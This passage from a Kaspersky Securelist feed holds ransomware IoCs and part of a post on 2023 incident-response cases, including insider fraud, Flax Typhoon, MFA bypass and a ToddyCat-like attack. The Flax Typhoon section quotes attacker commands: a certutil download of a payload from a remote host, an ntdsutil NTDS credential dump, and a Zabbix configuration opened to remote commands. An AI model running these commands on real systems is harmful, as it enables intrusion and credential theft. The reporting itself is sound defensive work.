  1046. <li>Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency. Use the latest <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bfda9ada279bba81">Threat Intelligence</a> information to stay up to date on the latest TTPs used by threat actors.</li>
  1047. <li>Use <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____9b047f5d537c64bd">Managed Detection and Response</a> services to help identify and stop an attack in the early stages, before the attackers achieve their ultimate goals.</li>
  1048. <li>To protect the corporate environment, educate your employees. Dedicated training courses can help, such as those provided in the <a href="https://www.kaspersky.com/small-to-medium-business-security/security-awareness-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____ef6f1f2ddb03f1d2">Kaspersky Automated Security Awareness Platform</a>.</li>
  1049. <li>Use complex security solutions, combining endpoint protection and automated incident response features, such as <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____501d6fad574f7808">Kaspersky NEXT</a>.</li>
  1050. </ul>
  1051. <h2 id="ioc">IoC</h2>
  1052. <p><strong>MD5</strong></p>
  1053. <p><a href="https://opentip.kaspersky.com/9b772efb921de8f172f21125dd0e0ff7?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______64ba9bc9a43b6adf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">9b772efb921de8f172f21125dd0e0ff7</a></p>
  1054. <p><a href="https://opentip.kaspersky.com/79b60f8b5052a9d4cc0c92c2cdc47485?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d9793931ea84b2e0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL
  1055. ">79b60f8b5052a9d4cc0c92c2cdc47485</a></p>
  1056. <p><a href="https://opentip.kaspersky.com/e713f05a62914496eef512a93a611622?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6a6ebd1165dda3d0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">e713f05a62914496eef512a93a611622</a></p>
  1057. <p><a href="https://opentip.kaspersky.com/3829a09bca120206883539eb33d55311?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______250fef02e649f8f3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">3829a09bca120206883539eb33d55311</a></p>
  1058. <p><a href="https://opentip.kaspersky.com/a8e214683307adaff39783dc656b398a?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6038e7db7f195538&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">a8e214683307adaff39783dc656b398a</a></p>
  1059. <p><a href="https://opentip.kaspersky.com/ac1a255e5c908f12ef68a45fc0043b16?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______848a7e7ce4d7c544&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">ac1a255e5c908f12ef68a45fc0043b16</a></p>
  1060. <p><a href="https://opentip.kaspersky.com/b1b42fa300d8f43c6deb98754caf0934?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e0285013b2421312&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">b1b42fa300d8f43c6deb98754caf0934</a></p>
  1061. <p><a href="https://opentip.kaspersky.com/3762f98a55f0ec19702f388fc0db74e2?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0154f5d9ee706fd7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">3762f98a55f0ec19702f388fc0db74e2</a></p>
  1062. <p><a href="https://opentip.kaspersky.com/6bd93817967cdb61e0d7951382390fa0?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cb514f6d6270a7b7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">6bd93817967cdb61e0d7951382390fa0</a></p>
  1063. <p><a href="https://opentip.kaspersky.com/c494342b6c84f649dece4df2d3ff1031?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9cbf884c0c1575c3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">c494342b6c84f649dece4df2d3ff1031</a></p>
  1064. <p><a href="https://opentip.kaspersky.com/16e708876c32ff56593ba00931e0fb67?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a7c3ec9e88468ce9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">16e708876c32ff56593ba00931e0fb67</a></p>
  1065. <p><a href="https://opentip.kaspersky.com/d32a3478aad766be96f0cdbda1f10091?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dd5f47c868d52d84&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">d32a3478aad766be96f0cdbda1f10091</a></p>
  1066. <p><a href="https://opentip.kaspersky.com/e98b3a8d2179e0bd0bebba42735d11b7?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______890a30122b27dd70&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">e98b3a8d2179e0bd0bebba42735d11b7</a></p>
  1067. <p><a href="https://opentip.kaspersky.com/98c7f6b6ddf6a01adb25457e9a3c52b8?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______568369655128fc49&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">98c7f6b6ddf6a01adb25457e9a3c52b8</a></p>
  1068. <p><a href="https://opentip.kaspersky.com/b13a1e9c7ef5a51f64a58bae9b508e62?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f5af632ac222fa8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">b13a1e9c7ef5a51f64a58bae9b508e62</a></p>
  1069. <p><strong>URLs</strong></p>
  1070. <p><a href="https://opentip.kaspersky.com/91.215.85.142%2FQWEwqdsvsf%2Fap.php?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7c314d10ef8e241d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">91.215.85.142%2FQWEwqdsvsf%2Fap.php</a></p>
  1071. <p><a href="https://opentip.kaspersky.com/whyers.io%2FQWEwqdsvsf%2Fap.php?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7b3d9f02527e383f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">whyers.io%2FQWEwqdsvsf%2Fap.php</a></p>
  1072. ]]></content:encoded>
  1073. <wfw:commentRss>https://securelist.com/mallox-ransomware/113529/feed/</wfw:commentRss>
  1074. <slash:comments>0</slash:comments>
  1075. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  1076. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1077. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  1078. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1079. </item>
  1080. <item>
  1081. <title>A deep dive into the most interesting incident response cases of last year</title>
  1082. <link>https://securelist.com/incident-response-interesting-cases-2023/113611/</link>
  1083. <comments>https://securelist.com/incident-response-interesting-cases-2023/113611/#respond</comments>
  1084. <dc:creator><![CDATA[Eduardo Ovalle, Ahmad Zaidi Said, AbdulRhman Alfaifi]]></dc:creator>
  1085. <pubDate>Tue, 03 Sep 2024 11:00:24 +0000</pubDate>
  1086. <category><![CDATA[SOC, TI and IR posts]]></category>
  1087. <category><![CDATA[2FA]]></category>
  1088. <category><![CDATA[Backdoor]]></category>
  1089. <category><![CDATA[Flax Typhoon]]></category>
  1090. <category><![CDATA[Incident response]]></category>
  1091. <category><![CDATA[Insider threat]]></category>
  1092. <category><![CDATA[Phishing]]></category>
  1093. <category><![CDATA[Spear phishing]]></category>
  1094. <category><![CDATA[Targeted attacks]]></category>
  1095. <category><![CDATA[ToddyCat]]></category>
  1096. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1097. <category><![CDATA[APT (Targeted attacks)]]></category>
  1098. <category><![CDATA[Internal threats]]></category>
  1099. <category><![CDATA[Windows malware]]></category>
  1100. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113611</guid>
  1101.  
  1102. <description><![CDATA[Kaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.]]></description>
  1103. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In 2023, Kaspersky&#8217;s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our <a href="https://securelist.com/kaspersky-incident-response-report-2023/112504/" target="_blank" rel="noopener">annual report</a>, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual <a href="https://securelist.com/webinars/analyzing-last-years-cyber-incident-cases/" target="_blank" rel="noopener">DFIRMA report webinar</a>.</p>
  1104. <h2 id="the-insider-fraud-attack">The insider fraud attack</h2>
  1105. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113659" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1106. <p>A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren&#8217;t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.</p>
  1107. <p>The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:</p>
  1108. <blockquote><p><em>A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.</em></p></blockquote>
  1109. <p>Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.</p>
  1110. <p>In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.</p>
  1111. <p>In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.</p>
  1112. <p>Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.</p>
  1113. <p>The results of the GERT team&#8217;s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.</p>
  1114. <h3 id="mitre-attck-techniques">Mitre ATT&amp;CK techniques</h3>
  1115. <table width="100%">
  1116. <tbody>
  1117. <tr>
  1118. <td style="text-align: left" width="25%"><strong>Tactic</strong></td>
  1119. <td style="text-align: left" width="25%"><strong>Technique used </strong></td>
  1120. <td style="text-align: left" width="25%"><strong>Technique ID</strong></td>
  1121. <td style="text-align: left" width="25%"><strong>Details</strong></td>
  1122. </tr>
  1123. <tr>
  1124. <td>Initial Access<br />
  1125. Persistence</td>
  1126. <td>Valid Accounts</td>
  1127. <td>T1078</td>
  1128. <td>The adversaries used legitimate credentials to access the VPN and the internal service</td>
  1129. </tr>
  1130. <tr>
  1131. <td>Initial Access</td>
  1132. <td>External Remote Services</td>
  1133. <td>T1133</td>
  1134. <td>The adversary used the сustomer&#8217;s VPN service to gain network access to the internal service</td>
  1135. </tr>
  1136. <tr>
  1137. <td>Credential Access</td>
  1138. <td>Steal Web Session Cookie</td>
  1139. <td>T1539</td>
  1140. <td>The adversary abused a misconfiguration in the transactions service to steal other users&#8217; cookies.</td>
  1141. </tr>
  1142. <tr>
  1143. <td>Impact</td>
  1144. <td>Data Manipulation</td>
  1145. <td>T1565</td>
  1146. <td>After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf.</td>
  1147. </tr>
  1148. </tbody>
  1149. </table>
  1150. <h2 id="flax-typhoon-slime13-apt-attack">Flax Typhoon/SLIME13 APT attack</h2>
  1151. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113660" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1152. <p>After enabling Kaspersky Managed Detection and Response (MDR) in a customer&#8217;s infrastructure, our platforms detected the presence of well-known software installed on the customer&#8217;s premises without their knowledge.</p>
  1153. <p>Although these applications were legitimate, attackers used them to gain persistent access to the victim&#8217;s environment.</p>
  1154. <p>In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name <em>conhost.exe</em>, but the service was started from a non-standard folder. GERT&#8217;s analysis confirmed that the application wasn&#8217;t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.</p>
  1155. <p>The supposed <em>conhost</em> application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin <em>certutil</em>, and then installed via command line as a system service:</p><pre class="crayon-plain-tag">certutil.exe -urlcache -split -f hxxp://&lt;Public IP&gt;/conhost.exe</pre><p>
  1156. Another suspicious service masquerading as <em>wshelper.dll</em> was observed on another host. This DLL was associated with <em>Zabbix agent</em>, which is typically deployed on a monitoring target to actively monitor local resources and applications.</p>
  1157. <p>Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by <em>Zabbix</em>.</p><pre class="crayon-plain-tag">EnableRemoteCommands=1
  1158. LogFile=0
  1159. Server=0.0.0.0/0
  1160. ListenPort=5432</pre><p>
  1161. Port 5432 was configured in a firewall rule to allow listening, with the &#8220;smart&#8221; name PGSQL to make it look legitimate.</p>
  1162. <p>GERT&#8217;s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:</p><pre class="crayon-plain-tag">cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test"  q  q
  1163. c:\windows\sysvol\domain\ntds\active directory\ntds.dit"</pre><p>
  1164. During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the <a href="https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/" target="_blank" rel="noopener">Flax Typhoon APT group</a>, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.</p>
  1165. <h3 id="mitre-attck-techniques">Mitre ATT&amp;CK techniques</h3>
  1166. <table width="100%">
  1167. <tbody>
  1168. <tr>
  1169. <td style="text-align: left" width="25%"><strong>Tactic</strong></td>
  1170. <td style="text-align: left" width="50%"><strong>Technique used </strong></td>
  1171. <td style="text-align: left" width="25%"><strong>Technique ID</strong></td>
  1172. </tr>
  1173. <tr>
  1174. <td>Initial Access</td>
  1175. <td>Exploit Public-Facing Application</td>
  1176. <td>T1190</td>
  1177. </tr>
  1178. <tr>
  1179. <td>Resource Development</td>
  1180. <td>Develop Capabilities: Malware</td>
  1181. <td>T1587.001</td>
  1182. </tr>
  1183. <tr>
  1184. <td>Credential Access</td>
  1185. <td>OS Credential Dumping: LSASS Memory</td>
  1186. <td>T1003.001</td>
  1187. </tr>
  1188. <tr>
  1189. <td>Credential Access</td>
  1190. <td>OS Credential Dumping: Security Account Manager</td>
  1191. <td>T1003.002</td>
  1192. </tr>
  1193. <tr>
  1194. <td>Command And Control</td>
  1195. <td>Protocol Tunneling</td>
  1196. <td>T1572</td>
  1197. </tr>
  1198. <tr>
  1199. <td>Command And Control</td>
  1200. <td>Ingress Tool Transfer</td>
  1201. <td>T1105</td>
  1202. </tr>
  1203. <tr>
  1204. <td>Credential Access</td>
  1205. <td>Brute Force: Password Spraying</td>
  1206. <td>T1110.003</td>
  1207. </tr>
  1208. <tr>
  1209. <td>Execution</td>
  1210. <td>Exploitation for Client Execution</td>
  1211. <td>T1203</td>
  1212. </tr>
  1213. <tr>
  1214. <td>Lateral Movement</td>
  1215. <td>Remote Services: Remote Desktop Protocol</td>
  1216. <td>T1021.001</td>
  1217. </tr>
  1218. <tr>
  1219. <td>Lateral Movement</td>
  1220. <td>Remote Services: SMB/Windows Admin Shares</td>
  1221. <td>T1021.002</td>
  1222. </tr>
  1223. <tr>
  1224. <td>Defense Evasion</td>
  1225. <td>Masquerading: Match Legitimate Name or Location</td>
  1226. <td>T1036 .005</td>
  1227. </tr>
  1228. </tbody>
  1229. </table>
  1230. <h2 id="the-mfa-lack-of-control">The MFA lack of control</h2>
  1231. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113661" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1232. <p>After enabling multi-factor authentication (MFA) for its &#8220;critical employees&#8221;, a financial company was targeted by a spear-phishing attack.</p>
  1233. <p>The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.</p>
  1234. <p>Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a <a href="https://securelist.com/phishing-kit-market-whats-inside-off-the-shelf-phishing-packages/106149/" target="_blank" rel="noopener">phishing kit</a> configured to automatically steal the MFA tokens.</p>
  1235. <p>The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company&#8217;s headquarters. The attackers also configured additional MFA devices to access the target user&#8217;s mailbox contents without being noticed and without tampering with the original mailbox.</p>
  1236. <p>The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.</p>
  1237. <p>One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured &#8220;send as&#8221; privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.</p>
  1238. <p>Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.</p>
  1239. <p>Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.</p>
  1240. <p>A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn&#8217;t listed in the attackers&#8217; forwarding rules, so the message was delivered to the customer&#8217;s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.</p>
  1241. <p>GERT&#8217;s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client&#8217;s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.</p>
  1242. <h3 id="mitre-attck-techniques">Mitre ATT&amp;CK techniques</h3>
  1243. <table width="100%">
  1244. <tbody>
  1245. <tr>
  1246. <td style="text-align: left" width="20%"><strong>Tactic</strong></td>
  1247. <td style="text-align: left" width="30%"><strong>Technique used </strong></td>
  1248. <td style="text-align: left" width="20%"><strong>Technique ID</strong></td>
  1249. <td style="text-align: left" width="30%"><strong>Details</strong></td>
  1250. </tr>
  1251. <tr>
  1252. <td>Initial Access</td>
  1253. <td>Phishing: Spear phishing Link</td>
  1254. <td>T1566.002</td>
  1255. <td>Targeted attack against customer domain from October 6, 2023</td>
  1256. </tr>
  1257. <tr>
  1258. <td>Persistence</td>
  1259. <td>Account Manipulation: Device Registration</td>
  1260. <td>T1098.005</td>
  1261. <td>Multiple authentication methods enabled for a compromised user</td>
  1262. </tr>
  1263. <tr>
  1264. <td>Credential Access</td>
  1265. <td>Brute Force: Password Guessing</td>
  1266. <td>T1110.001</td>
  1267. <td>Failed access on behalf of multiple users</td>
  1268. </tr>
  1269. <tr>
  1270. <td>Credential Access</td>
  1271. <td>Brute Force: Password Spraying</td>
  1272. <td>T1110.003</td>
  1273. <td>Tests for attempted access using credentials confirmed as stolen by Malware Stealers</td>
  1274. </tr>
  1275. <tr>
  1276. <td>Privilege Escalation</td>
  1277. <td>Account Manipulation: Additional Email Delegate Permissions</td>
  1278. <td>T1098.002</td>
  1279. <td>New permission configured to avoid detection and to access different mailboxes</td>
  1280. </tr>
  1281. <tr>
  1282. <td>Persistence</td>
  1283. <td>Email Collection: Email Forwarding Rule</td>
  1284. <td>T1114.003</td>
  1285. <td>New rules configured to evade detection and remain persistent</td>
  1286. </tr>
  1287. </tbody>
  1288. </table>
  1289. <h2 id="toddycat-like-apt-attack-with-an-icmp-backdoor">ToddyCat-like APT attack with an ICMP backdoor</h2>
  1290. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113662" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1024x529.png" alt="" width="1024" height="529" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1024x529.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-768x397.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1536x794.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-677x350.png 677w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-740x382.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-542x280.png 542w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-800x413.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04.png 1916w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1291. <p>Kaspersky&#8217;s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.</p>
  1292. <p>GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (<a href="https://www.cve.org/CVERecord?id=CVE-2021-26855" target="_blank" rel="noopener">CVE-2021-26855</a>).</p>
  1293. <p>One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the <em>wlbsctrl.dll</em> library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.</p>
  1294. <p>IKEEXT is a default service on Windows. It is invoked by the <em>svchost</em> process, which loads <em>ikeext.dll</em>, the DLL responsible for the IKEEXT service.</p>
